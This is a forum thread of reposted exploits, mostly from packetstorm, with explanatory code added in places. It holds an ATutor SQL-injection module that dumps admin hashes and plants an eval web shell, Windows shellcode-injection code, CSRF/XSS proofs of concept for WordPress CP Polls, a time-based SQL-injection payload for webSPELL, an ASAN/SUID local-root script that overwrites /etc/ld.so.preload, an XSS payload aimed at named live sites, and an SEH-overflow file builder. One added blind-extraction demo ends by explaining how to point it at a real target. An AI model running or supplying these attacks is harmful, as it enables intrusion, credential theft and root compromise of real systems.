        [System.Runtime.InteropServices.DllImport("kernel32")]
        private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
        [System.Runtime.InteropServices.DllImport("kernel32")]
        private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
        [System.Runtime.InteropServices.DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
        public override void Uninstall(System.Collections.IDictionary s) {
          byte[] sc = new byte[] {#{sc}};
          IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
          System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
          IntPtr id = IntPtr.Zero;
          WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
        }
      }
    }
    ^
    cs
  end
end
```

      exploit source : packetstormsecurity.com
  14. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution', 'Description' => %q{ This module exploits a SQL Injection vulnerability and an authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authenication and reach the administrators interface where they can upload malcious code. You are required to login to the target to reach the SQL Injection, however this can be done as a student account and remote registration is enabled by default. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code ], 'References' => [ [ 'CVE', '2016-2555' ], [ 'URL', 'http://www.atutor.ca/' ] # Official Website ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Mar 1 2016', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), OptString.new('USERNAME', [true, 'The username to authenticate as']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ],self.class) end def print_status(msg='') super("#{peer} - #{msg}") end def print_error(msg='') super("#{peer} - #{msg}") end def print_good(msg='') super("#{peer} - #{msg}") end def check # the only way to test if the target is vuln begin test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) rescue Msf::Exploit::Failed => e vprint_error(e.message) return Exploit::CheckCode::Unknown end if test_injection(test_cookie) return Exploit::CheckCode::Vulnerable else return 
      Exploit::CheckCode::Safe
    end
  end

  def create_zip_file
    zip_file = Rex::Zip::Archive.new
    @header = Rex::Text.rand_text_alpha_upper(4)
    @payload_name = Rex::Text.rand_text_alpha_lower(4)
    @plugin_name = Rex::Text.rand_text_alpha_lower(3)
    path = "#{@plugin_name}/#{@payload_name}.php"
    register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}")
    # the dropped file evals whatever is base64-encoded in the HTTP_<@header> request header
    zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
    zip_file.pack
  end

  def exec_code
    send_request_cgi({
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
    })
  end

  def upload_shell(cookie)
    post_data = Rex::MIME::Message.new
    post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
    post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
    data = post_data.to_s

    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => cookie,
      'agent'  => 'Mozilla'
    })

    if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
        'cookie' => cookie,
        'agent'  => 'Mozilla',
      })
      if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
          'cookie' => cookie,
          'agent'  => 'Mozilla',
        })
        return true
      end
    end

    # auth failed if we land here, bail
    fail_with(Failure::Unknown, "Unable to upload php code")
    return false
  end

  def get_hashed_password(token, password, bypass)
    # ATutor stores sha1(password); the login form submits sha1(stored_hash + token),
    # so with a dumped hash (bypass) we skip the inner sha1
    if bypass
      return Rex::Text.sha1(password + token)
    else
      return Rex::Text.sha1(Rex::Text.sha1(password) + token)
    end
  end

  def login(username, password, bypass)
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "login.php"),
      'agent'  => 'Mozilla',
    })
    token = $1 if res.body =~ /\) \+ "(.*)"\);/
    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/

    if bypass
      password = get_hashed_password(token, password, true)
    else
      password = get_hashed_password(token, password, false)
    end

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "login.php"),
      'vars_post' => {
        'form_password_hidden' => password,
        'form_login'           => username,
        'submit'               => 'Login'
      },
      'cookie' => cookie,
      'agent'  => 'Mozilla'
    })
    cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/

    # this is what happens when no state is maintained by the http client
    if res && res.code == 302
      if res.redirection.to_s.include?('bounce.php?course=0')
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, res.redirection),
          'cookie' => cookie,
          'agent'  => 'Mozilla'
        })
        cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
        if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
          res = send_request_cgi({
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path, res.redirection),
            'cookie' => cookie,
            'agent'  => 'Mozilla'
          })
          cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
          return cookie
        end
      elsif res.redirection.to_s.include?('admin/index.php')
        # if we made it here, we are admin
        return cookie
      end
    end

    # auth failed if we land here, bail
    fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
    return nil
  end

  def perform_request(sqli, cookie)
    # the search requires a minimum of 3 chars
    sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
    rand_key = Rex::Text.rand_text_alpha(1)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"),
      'vars_post' => {
        "search_friends_#{rand_key}" => sqli,
        'rand_key' => rand_key,
        'search'   => 'Search People'
      },
      'cookie' => cookie,
      'agent'  => 'Mozilla'
    })
    return res.body
  end

  def dump_the_hash(cookie)
    extracted_hash = ""
    sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
    login_and_hash_length = generate_sql_and_test(false, false, sqli, cookie).to_i
    for i in 1..login_and_hash_length
      sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
      asciival = generate_sql_and_test(false, false, sqli, cookie)
      if asciival >= 0
        extracted_hash << asciival.chr
      end
    end
    return extracted_hash.split(":")
  end

  def get_ascii_value(sql, cookie)
    # boolean-based blind: binary search the value with "expr>mid" conditions
    value = -1
    lower = 0
    upper = 126
    while lower < upper
      mid = (lower + upper) / 2
      sqli = "#{sql}>#{mid}"
      result = perform_request(sqli, cookie)
      if result =~ /There are \d entries./
        lower = mid + 1
      else
        upper = mid
      end
    end
    if lower > 0 and lower < 126
      value = lower
    else
      sqli = "#{sql}=#{lower}"
      result = perform_request(sqli, cookie)
      if result =~ /There are \d entries./
        value = lower
      end
    end
    return value
  end

  def generate_sql_and_test(do_true, do_test, sql, cookie)
    if do_test
      if do_true
        result = perform_request("1=1", cookie)
        return true if result =~ /There are \d entries./
      else
        result = perform_request("1=2", cookie)
        return true unless result =~ /There are \d entries./
      end
      return false
    elsif sql
      return get_ascii_value(sql, cookie)
    end
  end

  def test_injection(cookie)
    if generate_sql_and_test(true, true, nil, cookie)
      if generate_sql_and_test(false, true, nil, cookie)
        return true
      end
    end
    return false
  end

  def report_cred(opts)
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: fullname,
      post_reference_name: self.refname,
      private_data: opts[:password],
      origin_type: :service,
      private_type: :password,
      username: opts[:user]
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      last_attempted_at: Time.now
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def exploit
    student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
    report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
    print_status("Dumping username and password hash...")
    # we got admin hash now
    credz = dump_the_hash(student_cookie)
    print_good("Got the #{credz[0]} hash: #{credz[1]} !") if credz
    admin_cookie = login(credz[0], credz[1], true)
    print_status("Logged in as #{credz[0]}, uploading shell...")
    # install a plugin
    if upload_shell(admin_cookie)
      print_good("Shell upload successful!")
      # boom
      exec_code
    end
  end
end

exploit source : packetstormsecurity.com
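The blind extraction that dump_the_hash and get_ascii_value perform above, as an added example that is not part of the Metasploit module or the packetstorm post: the same two injected expressions are driven through a simulated connections.php oracle (a constructed stand-in holding a made-up AT_admins row; no ATutor instance or network is involved), and every character of login:hash is recovered by binary search on "expr>N" answers.

```python
import hashlib
import re

# Constructed stand-in for the first AT_admins row (login:password) on a target.
# ATutor stores sha1(password); that is why the module can later log in as admin
# with sha1(hash + token) instead of knowing the cleartext.
FAKE_ADMIN_ROW = "admin:" + hashlib.sha1(b"password").hexdigest()

# The two expressions the module injects; the oracle only ever sees "<expr>>N".
LENGTH_EXPR = ("(select/**/length(concat(login,0x3a,password))"
               "/**/from/**/AT_admins/**/limit/**/0,1)")
CHAR_EXPR = ("ascii(substring((select/**/concat(login,0x3a,password)"
             "/**/from/**/AT_admins/**/limit/**/0,1),{pos},1))")
TRUE_MARK = re.compile(r"There are \d+ entries\.")


def fake_target(condition):
    """Simulated connections.php search (constructed, no network).

    The module wraps the condition as  xxx' or <condition> or 1=''  so a true
    condition matches every row and the page shows a count, while a false one
    matches nothing. This stand-in evaluates the two expression shapes against
    FAKE_ADMIN_ROW and returns the text the module greps for.
    """
    m = re.fullmatch(r"(.+?)(>|=)(\d+)", condition)
    if m is None:
        raise ValueError("unsupported condition: " + condition)
    expr, op, n = m.group(1), m.group(2), int(m.group(3))
    if expr == LENGTH_EXPR:
        value = len(FAKE_ADMIN_ROW)
    else:
        pos = int(re.search(r",(\d+),1\)\)$", expr).group(1))
        value = ord(FAKE_ADMIN_ROW[pos - 1])
    hit = value > n if op == ">" else value == n
    return "There are 3 entries." if hit else "There are no entries."


def blind_int(expr, oracle, lo=0, hi=127):
    """Recover the integer value of expr (assumed within [lo, hi]) using only
    'expr>N' questions; each question is one request against a real target."""
    while lo < hi:
        mid = (lo + hi) // 2
        if TRUE_MARK.search(oracle(f"{expr}>{mid}")):
            lo = mid + 1   # value >= mid + 1
        else:
            hi = mid       # value <= mid
    return lo


def dump_admin(oracle):
    """Length first, then one binary search per character; returns (login, sha1)."""
    length = blind_int(LENGTH_EXPR, oracle)
    row = "".join(chr(blind_int(CHAR_EXPR.format(pos=i), oracle))
                  for i in range(1, length + 1))
    login, pw_hash = row.split(":", 1)
    return login, pw_hash


class Counting:
    """Wrap an oracle and count requests, to show the per-character cost."""

    def __init__(self, oracle):
        self.oracle, self.calls = oracle, 0

    def __call__(self, condition):
        self.calls += 1
        return self.oracle(condition)


if __name__ == "__main__":
    probe = Counting(fake_target)
    print(dump_admin(probe), probe.calls, "requests")
```

Searching the whole 0..127 range makes the equality fallback the module keeps for its 126 bound unnecessary: every value costs exactly seven requests, 329 for the 46-character login:hash row used here. Against a real target, replace fake_target with a function that POSTs the condition to connections.php the way perform_request does and returns the response body.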
  15. If you're commenting just to pad your post count, I get it... but that you don't read the CREDITS, that I honestly don't quite understand.
  16. # Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8

=============
Description
=============

With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results. You can receive email notifications every time a vote is added or opt to receive Excel reports periodically. The Polls can have dependent questions, this means that some questions are displayed depending on the selection made on other questions.
(copy of README.txt)

===================
Technical details
===================

The CP Polls plugin for WordPress is prone to persistent XSS via cross-site file upload. When we register a cp_poll it is sanitized correctly, but when we upload a CSV file we can bypass the protection and inject malicious HTML/JavaScript. There is no CSRF protection on that action, so it can be exploited with a CSRF attack by sending a malicious link to a victim (administrator) and waiting for execution of the malicious request.

=========================
Proof of Concept (html)
=========================

<html>
<body>
<script>
function submitRequest() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
  xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
  xhr.withCredentials = true;
  var body = "-----------------------------17460754011784\r\n" +
    "Content-Disposition: form-data; name=\"importfile\"; filename=\"csv.csv\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>, \"<img src=x onerror=alert('I am scared!')>\", \"sample subject\", \"\"\r\n" +
    "-----------------------------17460754011784\r\n" +
    "Content-Disposition: form-data; name=\"pbuttonimport\"\r\n" +
    "\r\n" +
    "Import\r\n" +
    "-----------------------------17460754011784--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
  <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

==========
CREDITS
==========

Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q

========
TIMELINE
========

2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclosure
  17. # Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file)
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
# Demo: https://www.youtube.com/watch?v=uc6P59BPEkU

=============
Description
=============

With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results. You can receive email notifications every time a vote is added or opt to receive Excel reports periodically. The Polls can have dependent questions, this means that some questions are displayed depending on the selection made on other questions.
(copy of README.txt)

===================
Technical details
===================

The CP Polls plugin for WordPress is prone to a file download issue. A hacker is able to attack an administrator by exploiting a CSRF in the 'change cp poll name' action, converting the downloadable report file (csv) into a malicious .bat file. Because there is no restriction on the cp poll name, the CSRF exploit can change the name to ... malicious.bat;

The semicolon (;) character must be restricted because the 'Content-Disposition' header uses this character as a parameter delimiter. For example, when we change the name of a cp poll to 'malicious.bat;' and an administrator downloads the report (thinking that it is a csv file), the response header becomes:

"" Content-Disposition: attachment; file=malicious.bat;.csv ""

The csv is ignored and the administrator gets a .BAT file.

So, how to exploit this vulnerability to execute commands on the victim's machine? We have an option. If the cp_poll is added in a post we can vote on it, and we can inject our malicious payload into a vote.

==============================
Proof of Concept CSRF (html)
==============================

https://www.youtube.com/watch?v=uc6P59BPEkU

==========================

If the CSRF attack is successful, we only need to inject our commands into votes. In the 'fieldnames' POST parameter we can inject our commands.

==========
CREDITS
==========

Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q

========
TIMELINE
========

2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclosure
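The header construction the advisory above describes, as an added example that is not the plugin's code: a naive builder that concatenates the poll name into Content-Disposition, a minimal model of how a client splits that header on ";" (which is why "malicious.bat;" is saved as a .bat), and a hardened builder beside it. It assumes the parameter is "filename=" (the advisory prints it as "file=") and that the served report is a .csv; the poll name is a constructed value.

```python
import re

# Poll name the advisory's CSRF sets; a constructed value, as is everything here.
EVIL_POLL_NAME = "malicious.bat;"


def naive_disposition(poll_name, ext="csv"):
    """What the advisory describes: the user-controlled name is concatenated
    straight into the header, so a ';' in it ends the filename parameter."""
    return f"attachment; filename={poll_name}.{ext}"


def browser_filename(header):
    """Minimal model of how a client reads Content-Disposition: parameters are
    split on ';'; an unquoted value ends at the next ';'; a quoted value is
    taken verbatim. Returns the filename the client would save under."""
    for param in header.split(";")[1:]:
        name, _, value = param.strip().partition("=")
        if name.strip().lower() == "filename":
            value = value.strip()
            if len(value) >= 2 and value[0] == value[-1] == '"':
                return value[1:-1]
            return value
    return None


# Anything outside this set (';', '"', CR, LF, spaces, path separators,
# non-ASCII) is replaced, so the name can neither end the parameter nor
# escape the quotes that the hardened builder puts around it.
UNSAFE = re.compile(r"[^A-Za-z0-9._-]")


def safe_disposition(poll_name, ext="csv", max_len=64):
    """Hardened form: whitelist the characters, bound the length, force the
    extension that is actually served, and quote the value."""
    base = UNSAFE.sub("_", poll_name)[:max_len] or "report"
    return f'attachment; filename="{base}.{ext}"'


if __name__ == "__main__":
    for build in (naive_disposition, safe_disposition):
        header = build(EVIL_POLL_NAME)
        print(f"{header!r:50} -> saved as {browser_filename(header)!r}")
```

Forcing the extension on the server side is what matters: even a quoted filename still lets the poll name choose the extension unless the server appends its own last. browser_filename is a deliberately small model (real clients also honour filename*, and some trim or sniff), but it reproduces the advisory's behaviour for the naive header.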
  18. #!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
# Released under the Snitches Get Stitches Public Licence.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (18/02/2016)
# FREE LAURI LOVE!
echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"
if [[ $# -eq 0 ]] ; then
    echo "use: $0 /full/path/to/targetbin"
    echo "where targetbin is setuid root and compiled w/ ASAN"
    exit 0
fi
echo "[+] First, we create our shell and library..."
# The constructor runs in every new process once /etc/ld.so.preload names this
# library; the first root process to start makes /tmp/rootshell setuid root.
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0); setgid(0); seteuid(0); setegid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 0;
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we drop our python symlink spraying tool..."
# ASAN writes its log to <log_path>.<pid>. PIDs are handed out sequentially, so
# pre-create foo.<pid> symlinks for the next 100 PIDs, all pointing at the target file.
cat << EOF > sym.py
#!/usr/bin/python
import os
curpid = os.getpid()
print(curpid)
for x in range(0, 100):
    newpid = curpid + x
    boom = "foo.%s" % (str(newpid))
    os.symlink("/etc/ld.so.preload", boom)
EOF
echo "[+] Spraying dir with symlinks..."
python sym.py
echo "[+] Hack the planet!"
# First run: the setuid target honours ASAN_OPTIONS and, as root, writes its log
# (which contains the suppressions string, i.e. the path /tmp/libhax.so) through
# the symlink into /etc/ld.so.preload. Second run: the loader preloads libhax.so
# into the root process and the constructor fires.
ASAN_OPTIONS='suppressions="/hacktheplanet /tmp/libhax.so hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1
$1 >/dev/null 2>&1
echo "[+] Tidy up a bit..."
rm -f foo*
rm -f sym.py
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell
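The check a defender wants after reading the above is whether any setuid or setgid binary on the host was built with ASAN at all, since the bug needs both. This is an added example, not part of infodox's script: a walk over the filesystem that flags set-id regular files whose bytes carry the ASAN runtime markers. The marker strings are an assumed heuristic (a substring scan, not an ELF parse), and the sample tree it builds is a constructed fixture of fake files, not real binaries.

```python
import os
import stat
import tempfile

# Assumed heuristic: a dynamically linked ASAN build names the runtime in
# DT_NEEDED and imports its init symbol; a static runtime still carries the
# symbol name. A substring hit is a lead to confirm with readelf/nm, not proof.
ASAN_MARKERS = (b"libasan.so", b"__asan_init")
SKIP_DIRS = ("/proc", "/sys", "/dev")


def linked_with_asan(path):
    """True if the file contains any of the ASAN marker strings."""
    try:
        with open(path, "rb") as f:
            blob = f.read()
    except OSError:
        return False
    return any(marker in blob for marker in ASAN_MARKERS)


def find_asan_setuid(root="/", root_owned_only=True):
    """Return sorted paths of set-id regular files under root that look ASAN-built."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not (st.st_mode & (stat.S_ISUID | stat.S_ISGID)):
                continue
            if root_owned_only and st.st_uid != 0:
                continue
            if linked_with_asan(path):
                hits.append(path)
    return sorted(hits)


def build_sample_tree(base=None):
    """Constructed fixture (fake ELF-looking files, not binaries) for a dry run:
    one ASAN-marked setuid file, one plain setuid file, one ASAN-marked but
    non-setuid file. Returns their paths plus whether the setuid bit stuck."""
    base = base or tempfile.mkdtemp(prefix="asan-suid-")
    files = {
        "asan_suid": (b"\x7fELF" + b"\0" * 12 + b"libasan.so.5\0__asan_init\0", 0o4755),
        "plain_suid": (b"\x7fELF" + b"\0" * 12 + b"libc.so.6\0", 0o4755),
        "asan_nosuid": (b"\x7fELF" + b"\0" * 12 + b"__asan_init\0", 0o755),
    }
    paths = {"root": base}
    for name, (blob, mode) in files.items():
        p = os.path.join(base, name)
        with open(p, "wb") as f:
            f.write(blob)
        os.chmod(p, mode)
        paths[name] = p
    paths["suid_supported"] = bool(os.stat(paths["asan_suid"]).st_mode & stat.S_ISUID)
    return paths


if __name__ == "__main__":
    tree = build_sample_tree()
    print(find_asan_setuid(tree["root"], root_owned_only=False))
    # on a real host: print(find_asan_setuid("/"))
```

Run it as root with the default root_owned_only=True to list only the binaries that matter for this bug; anything it reports should be confirmed with readelf -d (look for libasan in NEEDED) and then either rebuilt without -fsanitize=address or stripped of its set-id bit, since ASAN builds are debugging aids and do not belong on privileged binaries.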
  19. Advisory ID: HTB23291
Product: webSPELL
Vendor: webSPELL.org
Vulnerable Version(s): 4.2.4 and probably prior
Tested Version: 4.2.4
Advisory Publication: January 22, 2016 [without technical details]
Vendor Notification: January 22, 2016
Vendor Patch: February 12, 2016
Public Disclosure: February 17, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: Medium
CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in webSPELL, a popular CMS developed for the needs of esport-related communities. The vulnerability allows a remote authenticated attacker with cashbox access privileges to execute arbitrary SQL commands in the application's database and completely compromise the vulnerable website. This vulnerability can also be exploited by a non-authenticated and unprivileged attacker via the CSRF vector, to which the system is also prone.

The vulnerability exists due to insufficient filtration of user-supplied data passed via the "payid" HTTP POST parameter to the "/cash_box.php" script. A remote authenticated attacker with cashbox access privileges can alter the present SQL query and execute arbitrary SQL commands in the application's database.

A simple exploit below uses a time-based SQL injection technique to determine the current version of the MySQL server. The page will be loaded with some delay if the current MySQL server version is 5.x:

<form action="http://[host]/cash_box.php" method="post" name="main">
<input type="hidden" name="pay" value="1">
<input type="hidden" name="payid[' PROCEDURE analyse((select extractvalue(rand(), concat(0x3a, (IF(MID(version(), 1, 1) LIKE 5, BENCHMARK(5000000, SHA1(1)), 1))))), 1) -- 2]" value="1">
<input value="submit" id="btn" type="submit" />
</form>

This vulnerability can also be exploited via the CSRF vector, as the "/cash_box.php" script does not validate the origin of the HTTP request before processing user-supplied data in the SQL query.

-----------------------------------------------------------------------------------------------

Solution:

Update to webSPELL 4.2.5

More Information:
https://github.com/webSPELL/webSPELL/issues/309

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23291 - https://www.htbridge.com/advisory/HTB23291 - SQL Injection in webSPELL
[2] webSPELL - https://www.webspell.org/ - webSPELL is a free content management system under GNU GPL for creating websites easily
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
  20. The archive doesn't work, not even with the password decoded from base64.
  21. ######################
# Exploit Title : VANIRA CMS Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://tursweb.com/
# Google Dork : "Web Design > Tursweb.com " lang=
# Date: 2016/02/23
# Version : 6
######################
# PoC:
# lang=[XSS]
# Payload = '><img onerror=alert(1) src="asd">
#
# http://hncmed.ir/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://gceramas.ir/pdview.php?&lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://isatismodava.com/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://spadk9.com/shopcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://iransommer.com/productcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
  22. # Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE
# Date: 19 Feb 2016
# Exploit Author: Shantanu Khandelwal <shantanu561993@gmail.com <ishitasailor@gmail.com>>
# Vendor Homepage: http://www.stimslabs.com/
# Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe
# Version: 1.1.3.20
# Tested on: Windows XP SP3
# CVE : UNKNOWN
# ==============HOW TO CRASH ==================
# make the cutt file and open it in the STIMS Cutter application.
# Click on Build Report
# ===========================================
# Problems in exploitation
# Unable to find suitable SEH pointer
#
#!/usr/bin/env python
# Builds crash.cutt: an oversized [solution] name overruns the stack buffer
# and lands "BBBB" in the SEH handler slot when the report is built.
payload = """<!--block:#solution-->
[solution]
name="""
payload += "A" * 8452
payload += "BBBB"  # SEH overwrite
payload += r"""CCCC
desc=A
time=0
version=1
file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
time.created=131003117142810000
app=1.1.3
projects=1
<!--#solution:block-->
<!--block:A-->
[properties]
optimize=0
level=0
diversity=0
status=0
active=1
remnants=0
sort=0
version=1
desc=S
comment=
comment.active=0
notes=
notes.active=0
material=A
progress=100
calculation=0D99FF12
cost=222.000
time.gone=0
